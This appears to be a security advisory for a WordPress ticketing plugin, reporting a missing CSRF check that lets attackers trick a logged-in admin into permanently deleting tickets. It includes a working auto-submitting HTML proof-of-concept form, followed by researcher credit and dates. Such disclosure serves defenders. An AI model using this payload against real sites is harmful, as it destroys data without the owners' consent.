The plugin does not have CRSF check in its wpsc_tickets AJAX action, which could allow attackers to make a logged in admin call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action.
<html> <body onload="document.forms[0].submit()"> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpsc_tickets" /> <input type="hidden" name="setting_action" value="set_delete_permanently_bulk_ticket" /> <input type="hidden" name="ticket_id" value="1" /> </form> </body> </html>
Brandon Roldan
Brandon Roldan
Yes
2022-01-05 (about 1 years ago)
2022-01-05 (about 1 years ago)
2022-04-08 (about 1 years ago)